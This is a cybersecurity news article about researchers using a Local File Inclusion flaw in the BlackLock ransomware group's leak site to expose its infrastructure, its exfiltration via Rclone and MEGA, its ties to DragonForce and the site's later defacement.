In a striking case of "hacking the hackers," cybersecurity researchers have successfully infiltrated the infrastructure of the notorious BlackLock ransomware group. This breach has unveiled critical insights into the group's operations, exposing vulnerabilities that could be leveraged for future defense strategies.
How Researchers Exploited BlackLock’s Vulnerability
Threat intelligence firm Resecurity discovered a serious security flaw in BlackLock’s Data Leak Site (DLS). This misconfiguration allowed researchers to extract sensitive information, including configuration files, credentials, and a command history that detailed the group's activities.
According to Resecurity, this flaw led to the exposure of clearnet IP addresses associated with BlackLock's hidden infrastructure behind TOR services, revealing crucial operational details. The acquired command history represents one of the most significant OPSEC (Operational Security) failures in the ransomware ecosystem.
BlackLock: A Rebranded Threat on the Rise
BlackLock is a successor to the Eldorado ransomware group and has emerged as one of 2025’s most aggressive extortion syndicates. The group has targeted high-profile sectors, including:
Technology
Manufacturing
Construction
Finance
Retail
As of February 2025, BlackLock had publicly listed 46 victims across multiple countries, including Argentina, Brazil, Canada, France, Italy, Spain, the U.S., and the U.K.
Affiliate Recruitment and Attack Methods
In January 2025, BlackLock launched an underground affiliate network to recruit cybercriminals, particularly traffers. These individuals play a crucial role in the initial attack phase, directing unsuspecting victims to malicious sites that deploy malware, enabling unauthorized access to systems.
Key Findings from the BlackLock Data Leak
The vulnerability exploited by researchers was identified as a Local File Inclusion (LFI) flaw, which allowed them to retrieve sensitive files and command logs. Some of the most notable discoveries include:
Data Exfiltration via Rclone & MEGA Cloud Storage: BlackLock operators used Rclone to transfer stolen data to MEGA cloud storage. In some cases, they even installed the MEGA client directly on victim machines.
Disposable MEGA Accounts: The attackers created at least eight MEGA accounts using throwaway email addresses from YOPmail (e.g., zubinnecrouzo-6860@yopmail.com).
Links to DragonForce Ransomware: Reverse engineering of BlackLock revealed similarities in source code and ransom notes with a ransomware variant called DragonForce, which has targeted organizations in Saudi Arabia. Notably, DragonForce is coded in Visual C++, while BlackLock is written in Go.
Short-lived Mamona Ransomware Operation: A key BlackLock operator, known as “$$$”, briefly launched a separate ransomware strain called Mamona on March 11, 2025.
BlackLock DLS Defaced by DragonForce
In a surprising turn of events, BlackLock’s Data Leak Site was hacked and defaced by DragonForce on March 20, 2025. Researchers believe DragonForce may have used the same LFI vulnerability to gain access, posting configuration files and internal chat logs on the site’s homepage. A day earlier, the Mamona ransomware DLS suffered a similar attack.
The Future of BlackLock Ransomware
It remains uncertain whether BlackLock has merged with DragonForce or if the latter has simply taken over its infrastructure. Resecurity speculates that ransomware market consolidation could be at play, with DragonForce absorbing BlackLock’s affiliate network.
Interestingly, BlackLock’s main operator, $$$, has remained silent following these security breaches. This suggests that he may have anticipated the exposure and executed a quiet exit strategy before his operations became fully compromised.
Final Thoughts
The exposure of BlackLock ransomware's infrastructure marks a significant win for the cybersecurity community. With researchers uncovering major OPSEC failures, the incident highlights the growing vulnerabilities even among the most sophisticated cybercriminal groups.
Stay tuned for more updates on the evolving ransomware landscape.